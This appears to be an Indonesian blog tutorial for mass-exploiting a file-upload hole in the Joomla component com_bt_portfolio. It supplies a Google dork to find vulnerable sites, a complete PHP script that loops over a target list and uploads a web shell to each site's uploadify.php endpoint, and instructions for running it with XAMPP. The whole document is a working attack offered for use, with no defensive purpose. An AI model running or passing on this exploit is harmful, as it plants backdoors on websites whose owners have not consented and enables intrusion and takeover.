Bahan-bahan
1. Xampp ( Download )
2. List Target
2. PHP Exploiter
3. Dork
Dork:
inurl:/index.php?option=com_bt_portfolioinurl:/bt_portfolioKembangin lagi sendiri.
PHP Exploiter:
<?php
$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;
$uploadfile="shell.php";
$ch =curl_init("$site/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?> Ganti Shell.php dengan nama shell anda.
Simpan dengan format .php, save as type"all file" , simpan di folder C:\xampp\php
Cari target dengan dork
Simpan target dengan notepad di 1 folder exploit tadi, bersama dengan shell kalian juga simpan 1 folder.
Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
Lalu Run exploit tadi dengan CMD
perintahnya: "php exploitmu.php target.txt"
Lalu tekan Enter
Jika shell kalian berhasil terupload akan tampak seperti gambar diatas
Sekian ^_^
0 Komentar